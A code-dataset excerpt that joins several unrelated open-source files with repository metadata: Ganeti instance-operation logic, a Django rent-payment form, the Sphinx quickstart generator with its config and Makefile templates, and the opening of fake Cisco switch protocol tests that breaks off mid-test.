#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Logical units dealing with instance operations (start/stop/...).
Those operations have in common that they affect the operating system in a
running instance directly.
"""
import logging
from ganeti import constants
from ganeti import errors
from ganeti import hypervisor
from ganeti import locking
from ganeti import objects
from ganeti import utils
from ganeti.cmdlib.base import LogicalUnit, NoHooksLU
from ganeti.cmdlib.common import INSTANCE_ONLINE, INSTANCE_DOWN, \
CheckHVParams, CheckInstanceState, CheckNodeOnline, GetUpdatedParams, \
CheckOSParams, ShareAll
from ganeti.cmdlib.instance_storage import StartInstanceDisks, \
ShutdownInstanceDisks
from ganeti.cmdlib.instance_utils import BuildInstanceHookEnvByObject, \
CheckInstanceBridgesExist, CheckNodeFreeMemory, CheckNodeHasOS
from ganeti.hypervisor import hv_base
class LUInstanceStartup(LogicalUnit):
"""Starts an instance.
"""
HPATH = "instance-start"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def CheckArguments(self):
# extra beparams
if self.op.beparams:
# fill the beparams dict
objects.UpgradeBeParams(self.op.beparams)
utils.ForceDictType(self.op.beparams, constants.BES_PARAMETER_TYPES)
def ExpandNames(self):
self._ExpandAndLockInstance()
self.recalculate_locks[locking.LEVEL_NODE_RES] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE_RES:
self._LockInstancesNodes(primary_only=True, level=locking.LEVEL_NODE_RES)
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"FORCE": self.op.force,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
cluster = self.cfg.GetClusterInfo()
# extra hvparams
if self.op.hvparams:
# check hypervisor parameter syntax (locally)
utils.ForceDictType(self.op.hvparams, constants.HVS_PARAMETER_TYPES)
filled_hvp = cluster.FillHV(self.instance)
filled_hvp.update(self.op.hvparams)
hv_type = hypervisor.GetHypervisorClass(self.instance.hypervisor)
hv_type.CheckParameterSyntax(filled_hvp)
CheckHVParams(self, self.instance.all_nodes, self.instance.hypervisor,
filled_hvp)
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
if self.op.hvparams or self.op.beparams:
self.LogWarning("Overridden parameters are ignored")
else:
CheckNodeOnline(self, self.instance.primary_node)
bep = self.cfg.GetClusterInfo().FillBE(self.instance)
bep.update(self.op.beparams)
# check bridges existence
CheckInstanceBridgesExist(self, self.instance)
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node),
prereq=True, ecode=errors.ECODE_ENVIRON)
if remote_info.payload:
if hv_base.HvInstanceState.IsShutdown(remote_info.payload["state"]):
raise errors.OpPrereqError("Instance '%s' was shutdown by the user,"
" please shutdown the instance before"
" starting it again" % self.instance.name,
errors.ECODE_INVAL)
else: # not running already
CheckNodeFreeMemory(
self, self.instance.primary_node,
"starting instance %s" % self.instance.name,
bep[constants.BE_MINMEM], self.instance.hypervisor,
self.cfg.GetClusterInfo().hvparams[self.instance.hypervisor])
def Exec(self, feedback_fn):
"""Start the instance.
"""
if not self.op.no_remember:
self.cfg.MarkInstanceUp(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as started")
else:
StartInstanceDisks(self, self.instance, self.op.force)
result = \
self.rpc.call_instance_start(self.instance.primary_node,
(self.instance, self.op.hvparams,
self.op.beparams),
self.op.startup_paused, self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance: %s" % msg)
class LUInstanceShutdown(LogicalUnit):
"""Shutdown an instance.
"""
HPATH = "instance-stop"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = BuildInstanceHookEnvByObject(self, self.instance)
env["TIMEOUT"] = self.op.timeout
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if not self.op.force:
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
else:
self.LogWarning("Ignoring offline instance check")
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
else:
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Shutdown the instance.
"""
# If the instance is offline we shouldn't mark it as down, as that
# resets the offline flag.
if not self.op.no_remember and self.instance.admin_state in INSTANCE_ONLINE:
self.cfg.MarkInstanceDown(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as stopped")
else:
result = self.rpc.call_instance_shutdown(
self.instance.primary_node,
self.instance,
self.op.timeout, self.op.reason)
msg = result.fail_msg
if msg:
self.LogWarning("Could not shutdown instance: %s", msg)
ShutdownInstanceDisks(self, self.instance)
class LUInstanceReinstall(LogicalUnit):
"""Reinstall an instance.
"""
HPATH = "instance-reinstall"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
return BuildInstanceHookEnvByObject(self, self.instance)
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster and is not running.
"""
instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, instance.primary_node, "Instance primary node"
" offline, cannot reinstall")
if instance.disk_template == constants.DT_DISKLESS:
raise errors.OpPrereqError("Instance '%s' has no disks" %
self.op.instance_name,
errors.ECODE_INVAL)
CheckInstanceState(self, instance, INSTANCE_DOWN, msg="cannot reinstall")
if self.op.os_type is not None:
# OS verification
CheckNodeHasOS(self, instance.primary_node, self.op.os_type,
self.op.force_variant)
instance_os = self.op.os_type
else:
instance_os = instance.os
node_uuids = list(instance.all_nodes)
if self.op.osparams:
i_osdict = GetUpdatedParams(instance.osparams, self.op.osparams)
CheckOSParams(self, True, node_uuids, instance_os, i_osdict)
self.os_inst = i_osdict # the new dict (without defaults)
else:
self.os_inst = None
self.instance = instance
def Exec(self, feedback_fn):
"""Reinstall the instance.
"""
if self.op.os_type is not None:
feedback_fn("Changing OS to '%s'..." % self.op.os_type)
self.instance.os = self.op.os_type
# Write to configuration
self.cfg.Update(self.instance, feedback_fn)
StartInstanceDisks(self, self.instance, None)
try:
feedback_fn("Running the instance OS create scripts...")
# FIXME: pass debug option from opcode to backend
result = self.rpc.call_instance_os_add(self.instance.primary_node,
(self.instance, self.os_inst),
True, self.op.debug_level)
result.Raise("Could not install OS for instance %s on node %s" %
(self.instance.name,
self.cfg.GetNodeName(self.instance.primary_node)))
finally:
ShutdownInstanceDisks(self, self.instance)
class LUInstanceReboot(LogicalUnit):
"""Reboot an instance.
"""
HPATH = "instance-reboot"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"IGNORE_SECONDARIES": self.op.ignore_secondaries,
"REBOOT_TYPE": self.op.reboot_type,
"SHUTDOWN_TIMEOUT": self.op.shutdown_timeout,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
CheckNodeOnline(self, self.instance.primary_node)
# check bridges existence
CheckInstanceBridgesExist(self, self.instance)
def Exec(self, feedback_fn):
"""Reboot the instance.
"""
cluster = self.cfg.GetClusterInfo()
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node))
instance_running = bool(remote_info.payload)
current_node_uuid = self.instance.primary_node
if instance_running and \
self.op.reboot_type in [constants.INSTANCE_REBOOT_SOFT,
constants.INSTANCE_REBOOT_HARD]:
result = self.rpc.call_instance_reboot(current_node_uuid, self.instance,
self.op.reboot_type,
self.op.shutdown_timeout,
self.op.reason)
result.Raise("Could not reboot instance")
else:
if instance_running:
result = self.rpc.call_instance_shutdown(current_node_uuid,
self.instance,
self.op.shutdown_timeout,
self.op.reason)
result.Raise("Could not shutdown instance for full reboot")
ShutdownInstanceDisks(self, self.instance)
else:
self.LogInfo("Instance %s was already stopped, starting now",
self.instance.name)
StartInstanceDisks(self, self.instance, self.op.ignore_secondaries)
result = self.rpc.call_instance_start(current_node_uuid,
(self.instance, None, None), False,
self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance for"
" full reboot: %s" % msg)
self.cfg.MarkInstanceUp(self.instance.uuid)
def GetInstanceConsole(cluster, instance, primary_node, node_group):
"""Returns console information for an instance.
@type cluster: L{objects.Cluster}
@type instance: L{objects.Instance}
@type primary_node: L{objects.Node}
@type node_group: L{objects.NodeGroup}
@rtype: dict
"""
hyper = hypervisor.GetHypervisorClass(instance.hypervisor)
# beparams and hvparams are passed separately, to avoid editing the
# instance and then saving the defaults in the instance itself.
hvparams = cluster.FillHV(instance)
beparams = cluster.FillBE(instance)
console = hyper.GetInstanceConsole(instance, primary_node, node_group,
hvparams, beparams)
assert console.instance == instance.name
assert console.Validate()
return console.ToDict()
class LUInstanceConsole(NoHooksLU):
"""Connect to an instance's console.
This is somewhat special in that it returns the command line that
you need to run on the master node in order to connect to the
console.
"""
REQ_BGL = False
def ExpandNames(self):
self.share_locks = ShareAll()
self._ExpandAndLockInstance()
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Connect to the console of an instance
"""
node_uuid = self.instance.primary_node
cluster_hvparams = self.cfg.GetClusterInfo().hvparams
node_insts = self.rpc.call_instance_list(
[node_uuid], [self.instance.hypervisor],
cluster_hvparams)[node_uuid]
node_insts.Raise("Can't get node information from %s" %
self.cfg.GetNodeName(node_uuid))
if self.instance.name not in node_insts.payload:
if self.instance.admin_state == constants.ADMINST_UP:
state = constants.INSTST_ERRORDOWN
elif self.instance.admin_state == constants.ADMINST_DOWN:
state = constants.INSTST_ADMINDOWN
else:
state = constants.INSTST_ADMINOFFLINE
raise errors.OpExecError("Instance %s is not running (state %s)" %
(self.instance.name, state))
logging.debug("Connecting to console of %s on %s", self.instance.name,
self.cfg.GetNodeName(node_uuid))
node = self.cfg.GetNodeInfo(self.instance.primary_node)
group = self.cfg.GetNodeGroup(node.group)
return GetInstanceConsole(self.cfg.GetClusterInfo(),
self.instance, node, group)
|
badp/ganeti
|
lib/cmdlib/instance_operation.py
|
Python
|
gpl-2.0
| 17,072
| 0.007908
|
__all__ = ['ttypes', 'constants', 'PlayerStrategy']
|
pezia/poker-croupier
|
player/py/lib/api/player_strategy/__init__.py
|
Python
|
gpl-2.0
| 52
| 0
|
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django import forms
from main import models as mdl
from main.forms.utils.datefield import DatePickerInput, DATE_FORMAT
from main.models.enums import etat_suivi as etat_suivi_enum
READONLY_ATTR = "disabled"
class SuiviForm(forms.ModelForm):
# date_paiement = forms.HiddenInput()
# financement_location = forms.HiddenInput()
date_paiement_reel = forms.DateField(widget=DatePickerInput(format=DATE_FORMAT),
input_formats=[DATE_FORMAT, ],
required=False)
class Meta:
model = mdl.suivi_loyer.SuiviLoyer
fields = ['date_paiement', 'financement_location', 'etat_suivi', 'remarque', 'loyer_percu', 'charges_percu',
'date_paiement_reel']
def __init__(self, *args, **kwargs):
super(SuiviForm, self).__init__(*args, **kwargs)
self.fields['date_paiement'].widget = forms.HiddenInput()
self.fields['financement_location'].widget = forms.HiddenInput()
self.fields['date_paiement_reel'].help_text = '(Double clic = date du jour)'
if self.instance:
self.fields['loyer_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.loyer)
self.fields['charges_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.charges)
def clean(self):
self.validate_dates()
self.validate_status()
def validate_status(self):
if self.cleaned_data.get("etat_suivi") == etat_suivi_enum.PAYE and \
(self.cleaned_data.get("loyer_percu") is None or self.cleaned_data.get("loyer_percu") == 0) and \
(self.cleaned_data.get("charges_percu") is None or self.cleaned_data.get("charges_percu") == 0):
msg = u"L'état ne peut pas être à 'PAYE' si aucun montant n'est introduit pour les loyer/charge percue(s)"
self._errors["etat_suivi"] = self.error_class([msg])
def validate_dates(self):
date_paiement = self.cleaned_data.get("date_paiement")
date_paiement_reel = self.cleaned_data.get("date_paiement_reel")
if date_paiement_reel and date_paiement and date_paiement_reel < date_paiement:
msg = u"La date réelle de paiement doit être supérieure ou égale à la date supposée du paiement"
self._errors["date_paiement_reel"] = self.error_class([msg])
|
verpoorten/immobilier
|
main/forms/suivi.py
|
Python
|
agpl-3.0
| 3,478
| 0.004037
|
# -*- coding: utf-8 -*-
"""
sphinx.quickstart
~~~~~~~~~~~~~~~~~
Quickly setup documentation source to work with Sphinx.
:copyright: 2008 by Georg Brandl.
:license: BSD.
"""
import sys, os, time
from os import path
from sphinx.util import make_filename
from sphinx.util.console import purple, bold, red, nocolor
PROMPT_PREFIX = '> '
QUICKSTART_CONF = '''\
# -*- coding: utf-8 -*-
#
# %(project)s documentation build configuration file, created by
# sphinx-quickstart on %(now)s.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [%(extensions)s]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['%(dot)stemplates']
# The suffix of source filenames.
source_suffix = '%(suffix)s'
# The master toctree document.
master_doc = '%(master)s'
# General substitutions.
project = %(project)r
copyright = '%(year)s, %(author)s'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '%(version)s'
# The full version, including alpha/beta/rc tags.
release = '%(release)s'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%%B %%d, %%Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['%(dot)sstatic']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%%b %%d, %%Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = '%(project_fn)sdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('%(master)s', '%(project_fn)s.tex', '%(project)s Documentation',
'%(author)s', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
'''
MASTER_FILE = '''\
.. %(project)s documentation master file, created by sphinx-quickstart on %(now)s.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to %(project)s's documentation!
===========%(underline)s=================
Contents:
.. toctree::
:maxdepth: 2
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
'''
MAKEFILE = '''\
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d %(rbuilddir)s/doctrees $(PAPEROPT_$(PAPER)) \
$(SPHINXOPTS) %(rsrcdir)s
.PHONY: help clean html web pickle htmlhelp latex changes linkcheck
help:
\t@echo "Please use \\`make <target>' where <target> is one of"
\t@echo " html to make standalone HTML files"
\t@echo " pickle to make pickle files (usable by e.g. sphinx-web)"
\t@echo " htmlhelp to make HTML files and a HTML help project"
\t@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
\t@echo " changes to make an overview over all changed/added/deprecated items"
\t@echo " linkcheck to check all external links for integrity"
clean:
\t-rm -rf %(rbuilddir)s/*
html:
\tmkdir -p %(rbuilddir)s/html %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) %(rbuilddir)s/html
\t@echo
\t@echo "Build finished. The HTML pages are in %(rbuilddir)s/html."
pickle:
\tmkdir -p %(rbuilddir)s/pickle %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) %(rbuilddir)s/pickle
\t@echo
\t@echo "Build finished; now you can process the pickle files or run"
\t@echo " sphinx-web %(rbuilddir)s/pickle"
\t@echo "to start the sphinx-web server."
web: pickle
htmlhelp:
\tmkdir -p %(rbuilddir)s/htmlhelp %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) %(rbuilddir)s/htmlhelp
\t@echo
\t@echo "Build finished; now you can run HTML Help Workshop with the" \\
\t ".hhp project file in %(rbuilddir)s/htmlhelp."
latex:
\tmkdir -p %(rbuilddir)s/latex %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) %(rbuilddir)s/latex
\t@echo
\t@echo "Build finished; the LaTeX files are in %(rbuilddir)s/latex."
\t@echo "Run \\`make all-pdf' or \\`make all-ps' in that directory to" \\
\t "run these through (pdf)latex."
changes:
\tmkdir -p %(rbuilddir)s/changes %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) %(rbuilddir)s/changes
\t@echo
\t@echo "The overview file is in %(rbuilddir)s/changes."
linkcheck:
\tmkdir -p %(rbuilddir)s/linkcheck %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) %(rbuilddir)s/linkcheck
\t@echo
\t@echo "Link check complete; look for any errors in the above output " \\
\t "or in %(rbuilddir)s/linkcheck/output.txt."
'''
def mkdir_p(dir):
if path.isdir(dir):
return
os.makedirs(dir)
def is_path(x):
"""Please enter a valid path name."""
return path.isdir(x) or not path.exists(x)
def nonempty(x):
"""Please enter some text."""
return len(x)
def choice(*l):
def val(x):
return x in l
val.__doc__ = 'Please enter one of %s.' % ', '.join(l)
return val
def boolean(x):
"""Please enter either 'y' or 'n'."""
return x.upper() in ('Y', 'YES', 'N', 'NO')
def suffix(x):
"""Please enter a file suffix, e.g. '.rst' or '.txt'."""
return x[0:1] == '.' and len(x) > 1
def ok(x):
return True
def do_prompt(d, key, text, default=None, validator=nonempty):
while True:
if default:
prompt = purple(PROMPT_PREFIX + '%s [%s]: ' % (text, default))
else:
prompt = purple(PROMPT_PREFIX + text + ': ')
x = raw_input(prompt)
if default and not x:
x = default
if validator and not validator(x):
print red(" * " + validator.__doc__)
continue
break
d[key] = x
def inner_main(args):
d = {}
if os.name == 'nt' or not sys.stdout.isatty():
nocolor()
print bold('Welcome to the Sphinx quickstart utility.')
print '''
Please enter values for the following settings (just press Enter to
accept a default value, if one is given in brackets).'''
print '''
Enter the root path for documentation.'''
do_prompt(d, 'path', 'Root path for the documentation', '.', is_path)
print '''
You have two options for placing the build directory for Sphinx output.
Either, you use a directory ".build" within the root path, or you separate
"source" and "build" directories within the root path.'''
do_prompt(d, 'sep', 'Separate source and build directories (y/N)', 'n',
boolean)
print '''
Inside the root directory, two more directories will be created; ".templates"
for custom HTML templates and ".static" for custom stylesheets and other
static files. Since the leading dot may be inconvenient for Windows users,
you can enter another prefix (such as "_") to replace the dot.'''
do_prompt(d, 'dot', 'Name prefix for templates and static dir', '.', ok)
print '''
The project name will occur in several places in the built documentation.'''
do_prompt(d, 'project', 'Project name')
do_prompt(d, 'author', 'Author name(s)')
print '''
Sphinx has the notion of a "version" and a "release" for the
software. Each version can have multiple releases. For example, for
Python the version is something like 2.5 or 3.0, while the release is
something like 2.5.1 or 3.0a1. If you don't need this dual structure,
just set both to the same value.'''
do_prompt(d, 'version', 'Project version')
do_prompt(d, 'release', 'Project release', d['version'])
print '''
The file name suffix for source files. Commonly, this is either ".txt"
or ".rst". Only files with this suffix are considered documents.'''
do_prompt(d, 'suffix', 'Source file suffix', '.rst', suffix)
print '''
One document is special in that it is considered the top node of the
"contents tree", that is, it is the root of the hierarchical structure
of the documents. Normally, this is "index", but if your "index"
document is a custom template, you can also set this to another filename.'''
do_prompt(d, 'master', 'Name of your master document (without suffix)',
'index')
print '''
Please indicate if you want to use one of the following Sphinx extensions:'''
do_prompt(d, 'ext_autodoc', 'autodoc: automatically insert docstrings '
'from modules (y/N)', 'n', boolean)
do_prompt(d, 'ext_doctest', 'doctest: automatically test code snippets '
'in doctest blocks (y/N)', 'n', boolean)
print '''
If you are under Unix, a Makefile can be generated for you so that you
only have to run e.g. `make html' instead of invoking sphinx-build
directly.'''
do_prompt(d, 'makefile', 'Create Makefile? (Y/n)',
os.name == 'posix' and 'y' or 'n', boolean)
d['project_fn'] = make_filename(d['project'])
d['year'] = time.strftime('%Y')
d['now'] = time.asctime()
d['underline'] = len(d['project']) * '='
d['extensions'] = ', '.join(
repr('sphinx.ext.' + name) for name in ('autodoc', 'doctest')
if d['ext_' + name].upper() in ('Y', 'YES'))
if not path.isdir(d['path']):
mkdir_p(d['path'])
separate = d['sep'].upper() in ('Y', 'YES')
srcdir = separate and path.join(d['path'], 'source') or d['path']
mkdir_p(srcdir)
if separate:
builddir = path.join(d['path'], 'build')
else:
builddir = path.join(srcdir, d['dot'] + 'build')
mkdir_p(builddir)
mkdir_p(path.join(srcdir, d['dot'] + 'templates'))
mkdir_p(path.join(srcdir, d['dot'] + 'static'))
f = open(path.join(srcdir, 'conf.py'), 'w')
f.write(QUICKSTART_CONF % d)
f.close()
masterfile = path.join(srcdir, d['master'] + d['suffix'])
f = open(masterfile, 'w')
f.write(MASTER_FILE % d)
f.close()
create_makefile = d['makefile'].upper() in ('Y', 'YES')
if create_makefile:
d['rsrcdir'] = separate and 'source' or '.'
d['rbuilddir'] = separate and 'build' or d['dot'] + 'build'
f = open(path.join(d['path'], 'Makefile'), 'w')
f.write(MAKEFILE % d)
f.close()
print
print bold('Finished: An initial directory structure has been created.')
print '''
You should now populate your master file %s and create other documentation
source files. Use the sphinx-build script to build the docs, like so:
''' % masterfile + (create_makefile and '''
make <builder>
''' or '''
sphinx-build -b <builder> %s %s
''' % (srcdir, builddir))
def main(argv=sys.argv):
try:
return inner_main(argv)
except (KeyboardInterrupt, EOFError):
print
print '[Interrupted.]'
return
|
creasyw/IMTAphy
|
documentation/doctools/tags/0.4.2/sphinx/quickstart.py
|
Python
|
gpl-2.0
| 15,064
| 0.001062
|
# Copyright 2015-2016 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from tests.cisco import enable, create_interface_vlan, configuring, configuring_interface_vlan, \
assert_interface_configuration, remove_vlan, create_vlan, set_interface_on_vlan, configuring_interface, \
revert_switchport_mode_access, create_port_channel_interface, configuring_port_channel
from tests.util.protocol_util import SshTester, TelnetTester, with_protocol, ProtocolTest
class TestCiscoSwitchProtocol(ProtocolTest):
__test__ = False
test_switch = "cisco"
@with_protocol
def test_enable_command_requires_a_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
@with_protocol
def test_wrong_password(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("hello_world")
t.readln("% Access denied")
t.readln("")
t.read("my_switch>")
@with_protocol
def test_no_password_works_for_legacy_reasons(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible("")
t.read("my_switch#")
@with_protocol
def test_exiting_loses_the_connection(self, t):
t.write("enable")
t.read("Password: ")
t.write_invisible(t.conf["extra"]["password"])
t.read("my_switch#")
t.write("exit")
t.read_eof()
@with_protocol
def test_no_such_command_return_to_prompt(self, t):
enable(t)
t.write("shizzle")
t.readln("No such command : shizzle")
t.read("my_switch#")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_failing(self, t, read_tftp):
read_tftp.side_effect = Exception("Stuff")
enable(t)
t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write("gneh")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Error opening tftp://1.2.3.4/my-file (Timed out)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
@mock.patch("fake_switches.adapters.tftp_reader.read_tftp")
def test_command_copy_success(self, t, read_tftp):
enable(t)
